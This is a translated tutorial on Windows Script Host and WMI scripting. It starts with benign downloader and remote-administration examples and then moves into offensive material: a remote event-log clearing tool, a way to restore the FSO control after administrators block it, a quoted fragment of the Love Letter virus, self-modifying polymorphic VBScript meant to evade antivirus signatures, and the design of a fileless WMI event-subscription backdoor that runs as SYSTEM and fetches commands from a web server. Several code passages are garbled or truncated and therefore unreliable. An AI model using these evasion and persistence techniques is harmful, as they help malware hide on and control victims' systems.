In-depth excavation of Windows script technology
[Preface]

The Windows script discussed here is the WSH (Windows Script Host) script, not the script embedded in HTML or ASP pages. The former is interpreted by WScript or CScript, the latter by IE and IIS respectively. The language used throughout is VBScript. This article assumes the reader already has some grounding in Windows script programming; if not, please study "Windows Script Technology" [1] first.

[Review of WSH Objects]

Thanks to COM, WSH provides far more powerful functionality than batch files (.bat). Put bluntly, a WSH script just calls ready-made "controls" as objects and uses their properties and methods. Common objects include:

- WScript: the root object of the Windows Script Host object model, which any WSH script naturally uses. It provides several child objects such as WScript.Arguments and WScript.Shell; the former gives access to the full command-line parameter set, the latter can run programs, manipulate the registry, create shortcuts and access system folders.
- Scripting.FileSystemObject: an object originally designed for IIS, used to access the file system. This is probably the object everyone has met most often, because almost every Windows script virus must copy itself in order to infect others.
- ADODB.Stream: a child object of ActiveX Data Objects (ADO) that provides file access. It is part of the database component, but thanks to Microsoft, ADO is self-contained.
- Microsoft.XMLHTTP: an object designed to support XML and to access the network over HTTP. It is often used when exploiting cross-site scripting and SQL injection vulnerabilities.

There are also many less common ones:

- Active Directory Service Interface (ADSI) objects: very powerful, mainly used for Windows domain management.
- InternetExplorer object: does all the things IE can do.
- Word, Excel and Outlook objects: process Word documents, Excel spreadsheets and mail.
- WBEM objects: WBEM is Web-Based Enterprise Management. It provides powerful support for managing Windows; the WMI service discussed in the next section provides the interface to these objects.

Obviously, what WSH can make use of goes far beyond this. This article only scratches the surface, discussing a few of the more practical objects and their usage. First, an example that downloads a web resource with resume support; it uses the four common objects listed above.
```vbscript
If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then   ' check the name of the script host
    Die "Script host must be cscript.exe."                    ' the host is not CScript, so Die
End If
If WScript.Arguments.Count < 1 Then                           ' there must be at least one parameter
    Die "Usage: cscript webdl.vbs url [filename]"             ' small as it is, the usage line must not be forgotten
End If
url = WScript.Arguments(0)                                    ' the parameter array index starts at 0
If url = "" Then Die "URL can't be null."                     ' an empty URL is no use to me
If WScript.Arguments.Count > 1 Then                           ' first check whether there is more than one parameter
    filename = WScript.Arguments(1)                           ' then fetch the second one
Else                                                          ' no file name given, so derive it from the URL
    t = InStrRev(url, "/")                                    ' position of the last "/"
    If t = 0 Or t = Len(url) Then Die "Can not get filename to save."  ' no "/" at all, or "/" at the very end
    filename = Right(url, Len(url) - t)                       ' the file name to save as
End If
If Not Left(url, 7) = "http://" Then url = "http://" & url    ' add "http://" if it was left off
Set fso = WScript.CreateObject("Scripting.FileSystemObject")  ' fso, aso and http: none of the three can be spared
Set aso = WScript.CreateObject("ADODB.Stream")
Set http = WScript.CreateObject("Microsoft.XMLHTTP")
If fso.FileExists(filename) Then                              ' does the file to download already exist?
    start = fso.GetFile(filename).Size                        ' yes: resume from the current file size
Else
    start = 0                                                 ' no: everything starts from zero
    fso.CreateTextFile(filename).Close                        ' create the new file
End If
WScript.StdOut.Write "Connecting..."                          ' the show begins
current = start                                               ' the current position is the start position
Do
    http.Open "GET", url, True                                ' the http object is called here
    http.SetRequestHeader "Range", "bytes=" & start & "-" & CStr(start + 20480)  ' the secret of resuming is this header
    http.SetRequestHeader "Content-Type:", "application/octet-stream"
    http.Send                                                 ' build the request and send it
    For i = 1 To 120                                          ' wait in a loop
        If http.ReadyState = 3 Then ShowPlan                  ' state 3: data has started arriving, show progress
        If http.ReadyState = 4 Then Exit For                  ' state 4: data received completely
        WScript.Sleep 500                                     ' wait 500 ms
    Next
    If Not http.ReadyState = 4 Then Die "Timeout."            ' 20K not finished in a minute? time out!
    If http.Status > 299 Then Die "Error: " & http.Status & " " & http.StatusText  ' not a success status, so an error
    If Not http.Status = 206 Then Die "Server not support partial content."        ' the server does not support resuming
    aso.Type = 1                                              ' stream type set to binary
    aso.Open
    aso.LoadFromFile filename                                 ' open the file
    aso.Position = start                                      ' set the initial file pointer position
    aso.Write http.ResponseBody                               ' write the data
    aso.SaveToFile filename, 2                                ' save, overwriting
    aso.Close
    range = http.GetResponseHeader("Content-Range")           ' get the "Content-Range" header
    If range = "" Then Die "Can not get Content-Range."
    temp = Mid(range, InStr(range, "-") + 1)                  ' Content-Range looks like "bytes 123-456/789"
    current = CLng(Left(temp, InStr(temp, "/") - 1))          ' 123 is the start position, 456 the end position
    total = CLng(Mid(temp, InStr(temp, "/") + 1))             ' 789 is the total number of bytes in the file
    If total - current = 1 Then Exit Do                       ' end position plus 1 equals the total size: transfer complete
    start = start + 20480                                     ' otherwise fetch the next 20K
Loop While True
WScript.Echo Chr(13) & "Download (" & total & ") done."      ' download finished, show the total byte count

Function Die(msg)            ' the name comes from Perl's built-in function die
    WScript.Echo msg         ' say the last words ^_^
    WScript.Quit             ' and go to see Marx
End Function

Function ShowPlan()          ' display download progress
    If i Mod 3 = 0 Then c = "/"    ' a simple spinner effect
    If i Mod 3 = 1 Then c = "-"
    If i Mod 3 = 2 Then c = "\"
    WScript.StdOut.Write Chr(13) & "Download (" & current & ") " & c & Chr(8)  ' ASCII 13 is carriage return, 8 is backspace
End Function
```

As you can see, the HTTP control is very powerful: by manipulating HTTP headers, resumed downloads are easy to achieve. The example is single-threaded; in fact, because the HTTP control supports asynchronous calls and events, multi-threaded downloading can also be implemented. MSDN has detailed usage; for the details of resuming, see RFC 2616. Both FSO and ASO can access files, so what is the difference? In fact, apart from accessing binary (non-text) data, ASO has no reason to exist. If you replace ASO with FSO in the example, writing http.ResponseBody will fail. Conversely, ASO cannot tell whether a file exists; if the file does not exist, LoadFromFile raises an error. Of course, you could use the On Error Resume Next statement so the script host ignores non-fatal errors and then catch and handle them yourself, but why do that when FileExists() is ready to hand? In addition, since FSO is often used by script viruses and ASP Trojans, administrators may modify the control's registry information so that scripts cannot create FSO. In fact a single command, regsvr32 /s scrrun.dll, restores it; even if scrrun.dll has been deleted, you can just copy it back. After this warm-up, let's look at a powerful object: WBEM (provided by WMI).

[WMI Service]

First look at how MSDN describes WMI: Windows Management Instrumentation (WMI) is a scalable system management architecture that uses a unified, standards-based, extensible, object-oriented interface. When I first got to know WMI, I always thought it stood for "Windows Management Interface", heh.
Now look at the description of the WMI service: "Provides a common interface and object model to access management information about operating system, devices, applications and services. If this service is stopped, most Windows-based software will not function properly. If this service is disabled, any services that explicitly depend on it will fail to start." It sounds like a very important service. However, by default no service depends on it; rather, it depends on the RPC and EventLog services. But it is used frequently. I set the WMI service to manual and stopped it; after using the computer for a while, I found the WMI service had started again. It starts whenever it is needed, which is the characteristic of a service set to "manual". Once I learned how much management information WMI provides, I no longer found the self-starting of the WMI service strange. To appreciate the complexity of WMI, you can use WMITools.exe [2]. This is a tool set; with WMI Object Browser you can see the many objects WMI provides, which are not complex in themselves. More importantly, WMI also provides dynamic information, such as current processes, services, users, and so on.
The logical structure of WMI is as follows. First there are WMI consumers, such as scripts (strictly, the script host) and other applications that use the WMI interface. The consumer accesses the CIM Object Manager, Winmgmt (that is, the WMI service), which in turn accesses the CIM (Common Information Model) repository. Static or dynamic information (the properties of objects) is stored in the CIM repository, and objects also implement operations, such as starting a service. In reality this means invoking various DLLs through COM, and the request is finally completed by the APIs wrapped in those DLLs. WMI is event-driven: the operating system, services, applications, device drivers and so on can all act as event sources, generating event notifications through COM interfaces. Winmgmt captures the events and then refreshes the dynamic information in the CIM repository. This is why the WMI service depends on EventLog. With the concepts out of the way, let's see how to operate the WMI interface. The code below comes from RTCS, a script I wrote that remotely configures the Telnet service. Only the key parts are shown. First, create the object and connect to the server:

```vbscript
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objSWbemServices = objLocator.ConnectServer(ipaddress, "root/default", username, password)
```

The first statement creates a service locator object; the second connects to the server with the object's ConnectServer method. Besides the IP address, user name and password, there is also a namespace parameter, root/default. Just as the registry has root keys, the CIM repository is categorised; in object-oriented terms each category is called a namespace. Since RTCS has to handle the NTLM authentication mode and the Telnet service port, it needs to access the registry, and the object for operating the registry lives in root/default.

```vbscript
Set objInstance = objSWbemServices.Get("StdRegProv")           ' instantiate the StdRegProv object
Set objMethod = objInstance.Methods_("SetDWORDValue")           ' the SetDWORDValue method is itself an object
Set objInParam = objMethod.InParameters.SpawnInstance_()        ' instantiate the input parameter object
objInParam.hDefKey = &H80000002                                 ' root key is HKLM, code 80000002 (hex)
objInParam.sSubKeyName = "Software\Microsoft\TelnetServer\1.0"  ' set the subkey
objInParam.sValueName = "NTLM"                                  ' set the value name
objInParam.uValue = NTLM                                        ' set the value data; NTLM is a variable filled from user input
Set objOutParam = objInstance.ExecMethod_("SetDWORDValue", objInParam)
' then set the port
objInParam.sValueName = "TelnetPort"
objInParam.uValue = port                                        ' port is also a user-supplied parameter
Set objOutParam = objInstance.ExecMethod_("SetDWORDValue", objInParam)
```

See? This too is a namespace and an instantiation of a class. I felt very uncomfortable when I first learned WMI. I remember my junior high school teacher saying that when reading, one must first read the book thick and then read it thin: thick because you add your own ideas, thin because you have grasped the essence. Now let's read it thin. The code above can be rewritten as:

```vbscript
Set oLct = CreateObject("WbemScripting.SWbemLocator")
Set oReg = oLct.ConnectServer(ip, "root/default", user, pass).Get("StdRegProv")
HKLM = &H80000002
out = oReg.SetDWORDValue(HKLM, "Software\Microsoft\TelnetServer\1.0", "NTLM", NTLM)
out = oReg.SetDWORDValue(HKLM, "Software\Microsoft\TelnetServer\1.0", "TelnetPort", port)
```

Much simpler now, isn't it? Next is controlling the state of the Telnet service.

```vbscript
Set objSWbemServices = objLocator.ConnectServer(ipaddress, "root/cimv2", username, password)
Set colInstances = objSWbemServices.ExecQuery("select * from Win32_Service where Name = 'tlntsvr'")
```

This time the connection is to the root/cimv2 namespace. Then WQL (SQL for WMI) is used to look up the tlntsvr service; anyone familiar with SQL syntax knows what this does. The result is a set of Win32_Service instances, although the WHERE clause ensures the set always has exactly one member. For simplicity, assume we only need to toggle the service state.

```vbscript
For Each objInstance In colInstances
    If objInstance.Started = True Then          ' the Started property tells whether the service is running
        intStatus = objInstance.StopService()   ' running: call StopService to stop it
    Else
        intStatus = objInstance.StartService()  ' not running: call StartService to start it
    End If
Next
```

These are the key lines; the rest handles input, output and error tolerance. To summarise the process:

1. Connect to the server and the appropriate namespace.
2. Obtain one instance, or a set of instances, of the required object with the Get or ExecQuery method.
3. Read and write the object's properties and call its methods.

So how do you know which namespace to connect to and which objects to get? The classification in the WMI Technical Guide [3] lists a large number of commonly used objects; unfortunately there is no e-book version, so you will have to find it in a bookstore. You can also use the search function of WMI CIM Studio in WMITools, which makes it easy to find the desired object. After finding an object, WMI CIM Studio lists its properties and methods, and you can then look up specific help in MSDN. For application examples, besides the seven R-series scripts I wrote, see also reference [4]. One thing needs particular explanation: in reference [4], connecting to the server and namespace uses syntax like the following:

```vbscript
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
```

The detailed syntax is covered in the WMI Technical Guide and MSDN, but we do not care about it here, because this method has no user name and password parameters. It can therefore only be used when the current user already has access to the target system (including the local machine). If ConnectServer is used locally, the first parameter can be 127.0.0.1 or a dot ".", and the third and fourth parameters are empty strings "". Finally, there is the "privilege" issue for WMI. If you have read the ROTS code, you will have found two "strange" statements:

```vbscript
objSWbemServices.Security_.Privileges.Add 23, True
objSWbemServices.Security_.Privileges.Add 18, True
```

This requests privileges from the WMI service; 18 and 23 are privilege codes. Some important codes are listed below:

- 5: create an account in the domain
- 7: manage auditing, and view, save and clear the security log
- 9: load and unload device drivers
- 10: profile system performance
- 11: change the system time
- 18: shut down the local system
- 22: bypass traverse checking
- 23: allow remote shutdown

For details, see the WMI Technical Guide or MSDN. Not all privileges are available. When I wrote RCAS, I forgot to request privilege 11, so testing kept failing, and it took me a long time to find the reason. As long as you have permission to connect to the WMI service, you can always request privileges; this privilege mechanism merely constrains the behaviour of applications and improves system stability.
It is a bit strange that accessing the registry does not require any privilege. I really don't know what Microsoft's developers were thinking; perhaps registry access is just too common.

[Scripts Can Have a GUI Too]

Although the system provides two script hosts, WScript and CScript, responsible for the windowed environment and the command-line environment respectively, interaction between the user and a script in the windowed environment is actually not very convenient: parameters can only be supplied by creating a shortcut or by popping up an InputBox dialog, and nothing happens until the user clicks "OK". The intuitive, fast advantages of a windowed environment are absent. Fortunately, there is the InternetExplorer object, with which a script can provide a web-style GUI. Let's look at another example, a script for clearing system logs, which also reviews WMI:

```vbscript
Set ie = WScript.CreateObject("InternetExplorer.Application", "Event_")  ' create the IE object
ie.MenuBar = 0       ' remove the menu bar
ie.AddressBar = 0    ' remove the address bar
ie.ToolBar = 0       ' remove the toolbar
ie.StatusBar = 0     ' remove the status bar
ie.Width = 400       ' width 400
ie.Height = 400      ' height 400
ie.Resizable = 0     ' do not let the user resize the window
ie.Navigate "about:blank"   ' open a blank page
ie.Left = Fix((ie.Document.parentWindow.screen.availWidth - ie.Width) / 2)    ' centre horizontally
ie.Top = Fix((ie.Document.parentWindow.screen.availHeight - ie.Height) / 2)   ' centre vertically
ie.Visible = 1       ' make the window visible
With ie.Document     ' the following calls document.write to write HTML into the IE window;
    .Write "<html><head><title>Clear Log</title></head><body>"   ' Navigate could also open an HTML file, with the same effect
    .Write "Target IP: <input type=text id=ip><br>"
    .Write "Username: <input type=text id=user><br>"
    .Write "Password: <input type=password id=pass><br>"
    .Write "Type: <input type=checkbox id=app>Application "   ' not only input objects: every object DHTML supports,
    .Write "<input type=checkbox id=sys>System "               ' with its properties and methods, can be used;
    .Write "<input type=checkbox id=sec>Security<br>"          ' accessing them is like accessing objects in a frame from a web page
    .Write "<input type=button id=confirm value=OK> "
    .Write "<input type=button id=cancel value=Cancel>"
    .Write "</body></html>"
End With
Dim wmi                                   ' define a global variable
Set wnd = ie.Document.parentWindow        ' wnd is the window object
Set id = ie.Document.all                  ' id is the collection of all objects in the document
id.confirm.onclick = GetRef("Confirm")    ' handler for clicking the "OK" button
id.cancel.onclick = GetRef("Cancel")      ' handler for clicking the "Cancel" button
Do While True                             ' since the IE object supports events,
    WScript.Sleep 200                     ' the script waits for the various events in an infinite loop
Loop

Sub Event_OnQuit                          ' IE exit event handler
    WScript.Quit                          ' when IE exits, so does the script
End Sub

Sub Cancel                                ' "Cancel" event handler
    ie.Quit                               ' call IE's Quit method to close the window,
End Sub                                   ' which triggers Event_OnQuit, so the script exits too

Sub Confirm                               ' "OK" event handler, the key part
    With id
        If .ip.value = "" Then .ip.value = "."   ' an empty IP means operate on the local machine
        If Not (.app.checked Or .sys.checked Or .sec.checked) Then  ' app etc. are checkboxes; their checked
            wnd.alert "At least one log"                             ' attribute tells whether they are selected
            Exit Sub
        End If
        Set lct = CreateObject("WbemScripting.SWbemLocator")   ' create the server locator object
        On Error Resume Next                                   ' make the script host ignore non-fatal errors
        Set wmi = lct.ConnectServer(.ip.value, "root/cimv2", .user.value, .pass.value)  ' connect to root/cimv2
        If Err.Number Then                                     ' catch and handle the error
            wnd.alert "Connect WMI Server Failure"             ' here we just report the failure
            Err.Clear
            On Error GoTo 0                                    ' let the script host handle all errors again
            Exit Sub
        End If
        On Error GoTo 0
        If .app.checked Then ClearLog "Application"   ' clear each selected log
        If .sys.checked Then ClearLog "System"
        If .sec.checked Then ClearLog "Security"      ' note: XP has a restriction and the security log cannot be cleared
        wnd.alert "Log Cleared"
    End With
End Sub

Sub ClearLog(name)
    wql = "select * from Win32_NTEventlogFile where LogfileName = '" & name & "'"
    Set logs = wmi.ExecQuery(wql)           ' note that the members of logs are not individual log records
    For Each l In logs                      ' but the file object of the named log
        If l.ClearEventLog() Then
            wnd.alert "Clear log " & name & " error!"
            ie.Quit
            WScript.Quit
        End If
    Next
End Sub
```

To sum up the whole process: first create an InternetExplorer.Application object. Its direct effect is to start an iexplore process, but the window stays invisible until ie.Visible = 1 is set. Then write HTML into the IE window with the Document.Write method; for complex interfaces, the HTML can be saved as a file and opened with ie.Navigate(filename). Finally, respond to input in the window. This is basically the realm of DHTML. The biggest difference from ordinary script programming is that IE is event-driven: what you have to do is set the corresponding event handlers.

In this example the script only cares about three events: IE exiting, the "OK" button being clicked and the "Cancel" button being clicked. Note that the example contains only two statements that set event handlers, and no statement associates the IE exit event with the Event_OnQuit procedure. This uses a feature: the second parameter "Event_" given when creating the IE object is a prefix, and the handler for an event of the IE object is the prefix followed by the event name, so the handler for the OnQuit event is Event_OnQuit. When the "OK" button is clicked, the Confirm procedure is called. The example shows how to access objects inside IE; for instance, ie.Document.all.ip.value is the text entered in the Target IP box, and ie.Document.all.app.checked is True if the "Application" checkbox is ticked, otherwise False. To call the alert method, use ie.Document.parentWindow.alert. Accessing other IE objects is entirely similar; see the DHTML documentation for specifics. With a web interface, interaction becomes rich and colourful, and everyone can give full play to their creativity. For example, many GUI tools show a splash screen with copyright information when they start. We can simulate one:

```vbscript
Set ie = WScript.CreateObject("InternetExplorer.Application")
ie.FullScreen = 1
ie.Width = 300
ie.Height = 150
ie.Navigate "about:blank"
ie.Left = Fix((ie.Document.parentWindow.screen.availWidth - ie.Width) / 2)
ie.Top = Fix((ie.Document.parentWindow.screen.availHeight - ie.Height) / 2)
ie.Document.Write "
```
The most typical example is to turn FSO = CreateObject("scripting.filesystemObject") into fso = createObject("script" "ING.FILESYSTE" "MOBJECT"). An extension of this is to use the Execute statement: Execute("FSO = CREA" "teobject(""SCR" "ipting.filesy" "STEMOBJECT"")").

2. Variable names are changed automatically: Randomize : set of = createObject("scripting.filesystemObject") : VC = Of.OpenTextFile(wscript.scriptfullname, 1).readAll : fs = array("of", "vc", "fs", "fsc") : for fsc = 0 to 3 : VC = Replace(VC, FS(FSC), CHR(INT * 22) 65) & chr((int(RND * 22) 65) & chr((int(RND * 22) 65)) & Chr((IND * 22) 65))) : Next : Of.OpenTextFile(WScript.Scriptfullname, 2, 1). This code is taken from the Love Letter virus; run it and you will see what happens.

3. Use the official tool, the Script Encoder screnc.exe [5], to encrypt the script. The encrypted script can be interpreted directly by the script host. This would be the best solution, but the "gun shoots the bird that sticks its head out": because the encryption is reversible, every anti-virus product has a decoder, so the effect of this approach is essentially nil.

The effectiveness of the first method tells us this fact: detection of script viruses is basically static. Moreover, I found that even changing only the case of the code can evade detection (by one anti-virus product at least). The key to evasion is to reduce the signatures. For EXE evasion, the first thing one thinks of is a "packer", and this approach can be applied to scripts as well. For example: str = "cswpire.tohco" "" "" "" "" : for i = 1 to Len(str) Step 3 : REV = Rev Strreverse(MID(STR, I, 3)) : NEXT : EXECUTE REV is the simplest "shell". The algorithm of this "shell" is to reverse the order of every n characters; n is the "seed" of the algorithm, equal to 3 in this example. This "shell" is fixed, and it does not reduce the signatures at all. On the contrary, it adds a signature, such as "cswpire".

Look at a more complex example: str = "wscript.echo" "ok!" ": RDomize: key = int (RND * 8 2): str = Re: str = Replace (STR, CHR (34), CHR (34) CHR (34)): SET ASO = CREATEOBJECT ("AdoDb.Stream"): with aso: .Open: .writetext "Str =" CHR (34) STR CHR (34) "": key = "" cstr (key) "": str = rev: Execute str: function rev (): for i = 1 to len (str) Step key: Rev = Rev Strreverse (MID (STR , i, key): next: end function "":. Savetofile wscript.scriptfullname, 2: end with ": key = 1: str = Rev: Execute str: function rev (): for i = 1 to Len (STR ) Step key: rev = Rev Strreverse (MID (STR, I, Key): Next: End Function (note that this code is a single line with no line breaks). Save it as a VBS file and double-click it; the effect is the same as the previous code, a dialog pops up showing "OK!". However, look at the code after it has run, and it may have turned into something like this:

[reversed, scrambled one-line script omitted]

Run it again and it changes again: this script transforms itself. If you look at the code carefully you will find that the algorithm of the "shell" is unchanged and only the "seed" changes at random. Although every shelled copy is different, the "shell" itself still does not change. Many EXE packers have had the packer itself treated as malicious code and had signatures extracted from it. For better evasion, the script's "shell" also needs to change dynamically.

This is where so-called polymorphism comes in. However, EXE polymorphism is used to counter emulation, whereas the "polymorphism" of scripts only counters signature matching; the two are very different. For EXE, true polymorphism has not yet been heard of; only scripts can do it to some extent. Modifications that do not affect function, in addition to the three mentioned above, include: 3. "+" and "&" interchanged at random; 4. spaces, line continuations (_) and line breaks added in combination around characters such as ( ) - * / & and so on; 5. built-in functions replaced with custom functions; even if the custom function is just a thin wrapper around the built-in one, at least the keyword changes. ... There are other "polymorphism" algorithms to be studied. Applying these algorithms comes at the price of a large increase in code length. To write a relatively complete "shell", I believe knowledge of "grammar analysis" (parsing) is required, because the script has to "read" itself, achieving an effect similar to a Java obfuscator. This is very complicated; we can discuss it another time.

Below we combine "statement segmentation", "automatic variable renaming", "random case" and "+ / & interchange" and look at the effect: A001 = "wscript.echo" "OK!": A004 = CHR (34): Randomize: A005 = INT (RND * 24000 40960): A001 = A006 (A001): A000 = A005 MOD 10 2: A001 = Replace (A002, A004, A004 & A004): SET A007 = CreateObject ("AdoDb.Stream"): A007.Open: A007.Writetext HEX (A005 1) & "=" "& A004 & A001 & A004 & A008 (":: ":" A000 = "& A000 &": A001 = A002: Execute A001: Function A002 (): for A003 = 1 To Len (A001) Step A000: A002 = A002 STRREVERSE (MID (A001, A003, A000)): Next: End function "") & A004: A007 . Savetofile WScript.scriptfullname, 2: Function A006 (A009): For A00A = 0 to 12: A009 = Replace (A009, HEX (& HA000 A00A), HEX (A005 A00A)): Next: A006 = A009: End Function : Function A008 (A009): For A00A = 1 to Len (A009): A00B = MID (A009, A00A, 1): IF INT (RND * 2-1) THEN A00B = UCase (A00B): End if: IF A00A > 11 and INT (RND * 5) = 0 THEN A008 = A008 & A004 & CHR (38 INT * 2) * 5) & A004: END IF: A008 = A008 & A00B: NEXT: END FUNCTION: A000 = 1: A001 = A002: Execute A001: Function A002 (): for A003 = 1 To Len (A001) Step A000: A002 = A002 STRREVERSE (MID (A001, A003, A000): Next: End Function (again, no line breaks anywhere). This is the "original"; save it as a VBS file, double-click it, and a dialog still pops up showing "OK!".
After it runs you will see code similar to the following (the result is random):

[scrambled one-line script omitted]

Not enough? Cook it once more:

[scrambled one-line script omitted]

Is this enough? I don't know. Perhaps an anti-virus engine that ignores "+" and "&" and automatically joins the string pieces could do "textual analysis" ... Is this "shell" practical? No, because the algorithm of the "shell" is too simple. The "seed" is A000 = A005 Mod 10 + 2, so if automatic variable renaming is not counted, there are only 10 variants of the shelled code. How can this "shell" be improved? With more complex algorithms and more "polymorphism", of course.
If you are interested, you can read the "original" script code (replacing the colons with line breaks makes it more readable) and strengthen it. Of course, you can also start from scratch and show your own creativity.

[Making a Back Door]

Before the script itself, a very useful WMI object needs to be introduced. In fact this object is the key to this section, and the script back door is just one application of it. As mentioned earlier, WMI is event-driven. The whole event handling mechanism is divided into four parts:

1. Event providers: responsible for producing events. WMI contains many event providers, both specific ones such as the performance counter provider and generic ones for instance creation, modification, deletion and other generic events.
2. Event filters: the system generates a large number of events all the time, and a script captures the events it is interested in through a custom filter.
3. Event consumers: responsible for handling events. A consumer may be an executable program, a dynamic link library (DLL, loaded by WMI) or a script.
4. Event binding: binds a filter to a consumer, making clear which consumer is responsible for handling which events.

Event consumers are divided into temporary and permanent. A temporary consumer only cares about specific events while it is running. A permanent consumer is registered as a class instance in a WMI namespace and remains in effect until it is removed. Obviously, permanent event consumers are more practical.
Let's look at an example:
nslink = "winmgmts://./root/cimv2:" 'only a local connection is needed, so this syntax suffices; no SWbemLocator object
set asec = getobject(nslink & "ActiveScriptEventConsumer").spawninstance_ 'create an "active script event consumer"
asec.name = "stopped_spooler_restart_consumer" 'define the consumer's name
asec.scriptingengine = "vbscript" 'define the scripting language (only vbscript is supported)
asec.scripttext = "getobject(""winmgmts:win32_service='spooler'"").startservice" 'the script code
set asecpath = asec.put_ 'register the consumer; its object path is returned
set evtflt = getobject(nslink & "__EventFilter").spawninstance_ 'create an event filter
evtflt.name = "stopped_spooler_filter" 'define the filter name
qstr = "select * from __instancemodificationevent within 5 " 'poll for "instance modification events" every 5 seconds
qstr = qstr & "where targetinstance isa ""win32_service"" and " 'the class of the target instance is Win32_Service
qstr = qstr & "targetinstance.name=""spooler"" " 'the instance name is spooler
qstr = qstr & "and targetinstance.state=""stopped""" 'the instance state is Stopped
evtflt.query = qstr 'define the query
evtflt.querylanguage = "wql" 'define the query language (only wql is supported)
set fltpath = evtflt.put_ 'register the filter; its object path is returned
set fcbnd = getobject(nslink & "__FilterToConsumerBinding").spawninstance_ 'create the binding between filter and consumer
fcbnd.consumer = asecpath.path 'specify the consumer
fcbnd.filter = fltpath.path 'specify the filter
fcbnd.put_ 'perform the binding
wscript.echo "Installation complete"
What this script does: when the state of the Spooler service changes to Stopped, the consumer handles the event by restarting Spooler. Run net start spooler first, then net stop spooler; within at most 5 seconds Spooler starts again. Running the script as-is will fail, because ActiveScriptEventConsumer (ASEC) is not installed in the root\cimv2 namespace by default. Open %windir%\System32\wbem\scrcons.mof in Notepad and either delete the first line, #pragma namespace("\\\\.\\root\\default"), or change it to #pragma namespace("\\\\.\\root\\cimv2"). XP/2003 do not have this line, so nothing needs to be modified there. Then run:
C:\Winnt\System32\WBEM>mofcomp.exe -N:root\cimv2 scrcons.mof
Microsoft (R) 32-bit MOF assembler version 1.50.1085.0007
Copyright (C) Microsoft Corp. 1997-1999. All rights reserved.
Analysis MOF file: scrcons.mof
MOF file analysis successfully
Storing data into the repository...
Completed!
That installs ASEC into root\cimv2. mofcomp.exe and scrcons.mof both ship with the system. On 2000 ASEC is installed by default into the root\default namespace, and on XP/2003 into root\subscription; but because an event filter cannot capture events across namespaces (on XP/2003 it can), an event binding cannot span namespaces, and most events are generated in root\cimv2, ASEC has to be reinstalled into the namespace where the event source lives. The script below completes the ASEC reinstallation automatically.
set shl = createobject("WScript.Shell")
set fso = createobject("Scripting.FileSystemObject")
path = shl.expandenvironmentstrings("%windir%\system32\wbem\")
set mof = fso.opentextfile(path & "scrcons.mof", 1, false, -1) 'the MOF file is in unicode format
mofs = mof.readall
mof.close
mofs = replace(mofs, "\\default", "\\cimv2", 1, 1) 'replace the default namespace (first occurrence only)
mofp = path & "asecivv2.mof"
set mof = fso.createtextfile(mofp, false, true) 'create a temporary MOF file (unicode)
mof.write mofs
mof.close
shl.run path & "mofcomp.exe -N:root\cimv2 " & mofp, 0, true 'install into root\cimv2 and wait for mofcomp to finish
fso.deletefile(mofp)
wscript.echo "Installation complete"
Unregistering the permanent event subscription:
nslink = "winmgmts://./root/cimv2:"
myconsumer = "stopped_spooler_restart_consumer" 'specify the consumer name
myfilter = "stopped_spooler_filter" 'specify the filter name
set binds = getobject(nslink & "__FilterToConsumerBinding").instances_
for each bind in binds
  'the binding stores the consumer and filter paths, which end with the instance name in quotes
  if strcomp(right(bind.consumer, len(myconsumer) + 1), myconsumer & chr(34), 1) = 0 _
     and strcomp(right(bind.filter, len(myfilter) + 1), myfilter & chr(34), 1) = 0 then
    getobject("winmgmts:" & bind.consumer).delete_ 'delete the consumer
    getobject("winmgmts:" & bind.filter).delete_ 'delete the filter
    bind.delete_ 'delete the binding
    exit for
  end if
next
wscript.echo "Uninstall complete"
Besides ASEC, other WMI permanent event consumers are also available, such as SMTPEventConsumer: when something abnormal happens on the system, it can automatically send mail to the administrator's mailbox. The WMI Event Registration tool in WMI Tools is used to create, modify and delete instances of permanent event consumers, event filters and timer event sources in a specified namespace, and to bind or unbind them.
The various parts of the event handling mechanism are described in detail in the "WMI Technical Guide", and of course even more comprehensively in MSDN, so I will not repeat them here. (Take a sip of water and a break ^_^) Let's start discussing the script back door. WMI provides two timers, __AbsoluteTimerInstruction and __IntervalTimerInstruction, which trigger events at a specified time or at a specified interval. By registering a filter that captures timer events and binding it to ASEC, we gain a rare way of starting a program automatically. Moreover, the script code is hidden entirely in the CIM repository and does not exist as a separate file, so it is harder to detect and remove. Those are the advantages of a script back door; there are also many difficulties:
1. When the script runs, scrcons.exe, running as SYSTEM, acts as the script host (the Windows designers were not so stupid as to use the WMI service itself as the script host). This adds a process; although it is a normal process that anti-virus software ignores, it is too conspicuous. So the script cannot keep running in the background; it should start fresh each time and end as quickly as possible. After the script ends, the scrcons.exe process does not exit by itself, so the script must terminate its own host process through the Win32_Process object provided by WMI (burning the beanstalks to cook the beans?!).
2. The network capability of scripts is very poor; basically they can rely only on objects such as Microsoft.XMLHTTP. So the script back door cannot listen on a port or provide a cmd shell; it can only connect to a web server to fetch control commands. A feasible approach is to place a command file on a web server; the back door script locates the server by domain name, downloads the command file and acts according to its content. That requires a web server, or a temporary one built with a tool such as NetBox.
Of course, the server does not have to be online all the time; it only needs to be up when you want to control the script the next time it runs.
3. Since the script back door runs intermittently, the same command must be prevented from being run again. The solution is to record the length of the command in the registry; each time a command is fetched, compare its length with the recorded one: if they are the same, skip it; if they differ, overwrite the record and execute the command.
4. To get through the firewall with the IE object, the XMLHTTP object must be created inside IE, where it is subject to the security level of the Internet zone. Even if the code is saved in an HTML file and opened with IE, that only gets it into the "My Computer" zone, and creating an unsafe ActiveX object still pops up a warning dialog. The solution is to modify the registry and change the security settings temporarily.
5. The WScript object is provided by wscript.exe or cscript.exe, not by scrcons.exe, so many commonly used functions such as WScript.Sleep cannot be used. Without Sleep, XMLHTTP cannot be used asynchronously, and synchronous XMLHTTP may block for a long time, which is a far greater drawback. Delaying by calling the ping command creates a new process, and delaying with the Popup method of WScript.Shell produces a "dong" sound. Fortunately, Microsoft.XMLHTTP has "relatives" such as MSXML2.XMLHTTP, MSXML2.ServerXMLHTTP, MSXML2.DOMDocument and WinHttp.WinHttpRequest; the last one can set a timeout, which is exactly what is needed. Even with so many difficulties, the script back door is still worth the challenge.
